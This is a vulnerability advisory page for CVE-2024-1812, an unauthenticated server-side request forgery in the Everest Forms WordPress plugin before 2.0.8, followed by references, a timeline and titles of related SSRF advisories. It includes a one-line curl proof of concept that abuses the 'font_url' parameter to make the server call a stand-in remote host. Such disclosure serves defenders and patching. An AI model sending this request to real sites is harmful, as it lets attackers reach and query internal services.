Everest Forms < 2.0.8 – Unauthenticated Server-Side Request Forgery via font_url | CVE 2024-1812 | Plugin Vulnerabilities

Description

The Everest Forms plugin for WordPress is vulnerable to Server-Side Request Forgery via the 'font_url' parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
It is worth mentioning that while the fix prevents the attack, it broke the `Load Fonts Locally` functionality.

Proof of Concept

Make sure the option `Load Fonts Locally` is enabled.
curl --url 'http://target_site.tld/wp-admin/admin-ajax.php?action=everest_forms_get_local_font_url' --data 'font_url=http://remote-host.tld:$PORT/?bypass=https://fonts.googleapis.com'

Affects Plugins

Fixed in 2.0.8

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/d4561441-d147-4c02-a837-c1656e17627d

Classification

Type

SSRF

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

hir0ot

Verified

Yes

WPVDB ID

b5849147-396b-4538-95b7-db46bc7f385b

Timeline

Publicly Published

2024-03-15 (about 2 years ago)

Added

2024-03-19 (about 2 years ago)

Last Updated

2024-03-19 (about 2 years ago)

Other

Published

Title

Published

2023-07-26

Title

Assistant < 1.4.4 - Editor+ SSRF

Published

2024-05-10

Title

Migration Backup Restore < 3.5.0 - Admin+ SSRF

Published

2026-01-06

Title

IMGspider <= 2.3.12 - Authenticated (Contributor+) Server-Side Request Forgery

Published

2023-02-10

Title

Shortcodes Ultimate < 5.12.7 - Subscriber+ SSRF

Published

2025-02-24

Title

Enfold < 7.0 - Authenticated (Subscriber+) Server-Side Request Forgery via attachment_id